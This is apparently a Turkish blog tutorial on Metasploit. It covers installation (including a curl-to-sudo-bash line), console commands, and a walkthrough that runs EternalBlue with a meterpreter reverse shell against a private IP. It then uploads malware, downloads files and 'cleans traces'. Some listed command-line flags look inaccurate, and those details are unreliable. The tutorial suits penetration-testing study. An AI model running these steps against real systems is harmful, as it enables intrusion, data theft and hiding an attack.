Published on

Metasploit Nedir Nasıl Kullanılır

Authors

Metasploit Nedir?

Metasploit, açık kaynaklı bir penetrasyon testi framework'üdür. Kullanıcıların güvenlik açıklarını tespit etmelerine, doğrulamalarına ve sömürmelerine olanak tanır. Metasploit, exploitler, payloadlar ve yardımcı modüller gibi çeşitli bileşenleri içerir ve ağ keşfi, zafiyet tarama, sömürme ve post-exploitation gibi görevler için kullanılır.

Metasploit Kurulumu

sudo apt-get install metasploit-framework

veya

curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfdev.sh | sudo bash

Kullanım Alanları

  • Ağ Keşfi: Ağdaki cihazları ve hizmetleri tarama.
  • Zafiyet Tarama: Bilinen güvenlik açıklarını bulma.
  • Sömürme (Exploitation): Güvenlik açıklarını kullanarak sistemlere sızma.
  • Post-Exploitation: Sistemde kalıcı erişim sağlama ve veri toplama.

Parametreler

Metasploit'in parametreleri, aracın çeşitli işlevlerini kontrol etmek ve yapılandırmak için kullanılır. İşte yaygın olarak kullanılan bazı parametrelerden bazıları:

  1. -h veya --help: Metasploit'in kullanımına ilişkin genel yardım ve belge bilgilerini görüntüler.

  2. -x veya --exploit: Belirli bir güvenlik açığına karşı bir saldırı başlatır.

  3. -m veya --module: Belirli bir modülü belirtir. Metasploit'in modüler yapısı, çeşitli saldırı vektörleri ve araçlarını birbirinden ayırır.

  4. -r veya --rc-file: Bir otomatikleştirme betiği dosyasını belirtir. Bu, otomatik bir işlem gerçekleştirmek için kullanılabilir.

  5. -L veya --list: Modül listesini veya diğer içeriği görüntüler.

  6. -p veya --payload: Hedefe teslim edilecek kötü amaçlı yazılım (payload) türünü belirtir.

  7. -t veya --threads: Eşzamanlı olarak çalışacak iş parçacığı sayısını belirtir. Bu, saldırı hızını artırabilir.

  8. -o veya --output: Çıktı dosyasının adını belirtir. Sonuçları bir dosyaya kaydetmek için kullanılır.

  9. -v veya --verbose: Daha fazla ayrıntı içeren çıktıyı etkinleştirir. Bu, hata ayıklama veya analiz için yararlı olabilir.

Temel İşlevler

  1. msfconsol: Metasploit Framework'ü başlatmak için kullanılır. Metasploit konsoluna giriş yapmanızı sağlar.

  2. db_status: Veritabanı bağlantısının durumunu kontrol etmek için kullanılır. Metasploit, tarama sonuçlarını ve diğer bilgileri saklamak için bir veritabanı kullanır.

  3. use: Belirli bir modülü veya exploit'i kullanmak için kullanılır. Örneğin, use exploit/windows/smb/ms08_067_netapi gibi bir komutla exploit modülü seçilir.

  4. show options: Seçilen exploit veya modül için kullanılabilir seçenekleri ve parametreleri görüntüler.

  5. set: Bir exploit veya modül için parametreleri ayarlamak için kullanılır. Örneğin, set RHOSTS 192.168.1.100 ile hedefin IP adresini belirleyebilirsiniz.

  6. exploit: Belirtilen exploit'i veya modülü hedefe karşı başlatmak için kullanılır.

  7. search: Metasploit modülleri içinde belirli bir anahtar kelime aramak için kullanılır. Örneğin, search smb ile SMB ile ilgili exploit ve modülleri arayabilirsiniz.

  8. back: Bir önceki menüye geri dönmek için kullanılır.

  9. sessions: Etkin oturumları yönetmek için kullanılır. Bir hedefe erişim sağlandığında, bu komutla oturumu yönetebilir ve kullanabilirsiniz.

Metasploit Nasıl Kullanılır?

Adım 1: Metasploit'i Başlatma

msfconsole
Msf

Adım 2: Açık Portların Taraması (Nmap ile)

nmap -p- 192.168.1.0/24

Adım 3: Exploit Seçimi

use exploit/windows/smb/ms17_010_eternalblue

Adım 4: Payload Seçimi ve Parametre Ayarları

set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp

Adım 5: Exploit'i Çalıştırma

exploit

Adım 6: Erişim Sağlama

sessions -i 1

Burada, -i parametresiyle birlikte oturum numarasını belirtirsiniz.

Adım 7: Sistemi İnceleme ve Kontrol

Artık hedef sistemde Metasploit oturumunuz olduğuna göre, sistemde çeşitli işlemler yapabilirsiniz. Örneğin:

shell: Komut istemi üzerinden hedef sistemi keşfetmek için.

upload: Kötü amaçlı yazılım yüklemek için.

download: Hedef sistemden dosyalar indirmek için.

Adım 8: İzleri Kaldırma Saldırı tamamlandığında, izleri kaldırmak önemlidir. Oturumları sonlandırabilir ve hedef sistemdeki izleri temizleyebilirsiniz.

sessions -K

Bu, etkin oturumları sonlandıracaktır.

Ancak, Metasploit özellikleri bununla sınırlı değildir. Daha fazla bilgi edinmek isterseniz, Metasploit'in resmi web sitesinden dökümantasyonları inceleyebilirsiniz.